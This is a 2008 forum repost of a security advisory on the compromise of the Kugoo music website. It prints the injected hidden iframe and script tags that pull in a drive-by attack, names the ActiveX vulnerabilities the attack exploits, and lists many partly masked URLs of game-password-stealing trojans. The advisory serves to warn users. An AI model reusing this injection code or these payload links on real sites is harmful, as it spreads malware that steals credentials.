下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 4472|回复: 0
打印 上一主题 下一主题

酷狗网遭遇黑客入侵 用户小心病毒暗流(图)

[复制链接]

该用户从未签到

跳转到指定楼层
1
发表于 2008-4-19 06:42:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
4月16日,安天实验室发现,酷狗网(http://www.kugoo.com/home/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。 该网站问题代码:
- S) q- {& j- D) n+ |  l0 x+ y8 B6 X7 r+ q: w; m3 o: n
src="http://ring.ku***.com/cairing/BuildJs/HomePH.aspx"http://ring.ku***.com/cairing/BuildJs/HomePH.aspx

4 k8 b' Z8 @9 t9 D: ?3 E4 j问题框架代码:
# q1 T# C6 L) [% {( w; z
( Y+ W6 w- g; m* ~; N
$ o0 h5 `2 R  z2 u8 @
$ n* Z5 j" ?# m: M" w  h
<iframe src=http://s12.bm***.com/tmp.htm width=0 height=0></iframe> http://s12.bm***.com/tmp.htm

/ q6 n3 h0 s  S& A问题框架代码: ) D1 X! v- T, T( q4 M0 e. @9 Y
. ~6 x3 g3 E( M1 N- w

! D  `! }6 K& ~, N5 D8 t; R7 [: v* h0 J2 f3 t' _
<script language="javascript" src="count.js"></script> http://s12.bm***.com/count.js

9 c8 R& Z5 _. P9 B5 Z, K5 f2 v问题框架代码: 5 \2 i4 ]* P( G! Y+ F

7 J2 y0 k/ D0 A" M4 q" k/ g" I* R8 @% ?9 Z& Z/ y; _+ [
8 p. q: P$ H; v& A
<iframe src=test.htm width=0 height=0></iframe> http://s12.bm***.com/test.htm

3 A- ]: p+ h9 J" f+ P$ |3 a( ~/ b该加密网马解密后可知利用以下漏洞来传播:  
, ]' D3 _3 r( G* q6 Q
9 z0 A/ H2 U2 A8 }0 l4 D
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)暴风影音播放器MPS.StormPlayer漏洞RealPlayer播放器IERPCtl.IERPCtl.1漏洞迅雷漏洞百度搜霸漏洞联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

" h- ^4 I$ D. h4 A当用户运行酷狗2007或访问酷狗网(http://www.kugoo.com/home/)时,系统会自动下载以下病毒文件: 6 H# B+ |- V5 n  w! ?9 m

" T" d) }, ]! ?8 h8 c; g6 r. p
  http://aa1.us***.com/down/1.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/2.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/3.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafp)  http://aa1.us***.com/down/4.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaf)  http://aa1.us***.com/down/5.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zjk)  http://aa1.us***.com/down/6.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.anv)  http://aa1.us***.com/down/7.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.anv)  http://aa1.us***.com/down/8.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aadu)  http://aa1.us***.com/down/9.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/10.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/11.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aadz)  http://aa2.us***.com/down/12.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafo)  http://aa2.us***.com/down/13.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/14.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/15.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/16.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/17.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.aaig)  http://aa2.us***.com/down/18.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/19.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/20.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/21.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/22.exe   病毒名:(Trojan-Downloader.Win32.Tiny.anv)  http://aa3.us***.com/down/23.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/24.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/25.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/26.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaes)  http://aa3.us***.com/down/27.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/28.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aasp)  http://aa3.us***.com/down/29.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zvr)  http://aa3.us***.com/down/30.exe   病毒名:(Trojan-Downloader.Win32.Tiny.anv)  http://aa3.us***.com/down/31.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.yip)  http://aa3.us***.com/down/32.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafg)  http://aa3.us***.com/down/33.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)  http://aa3.us***.com/down/34.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)
& J' k0 v' r$ |/ g& O7 _
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 顶 踩 转发到微博

本版积分规则

关闭

下沙大学生网推荐上一条 /1 下一条

快速回复 返回顶部 返回列表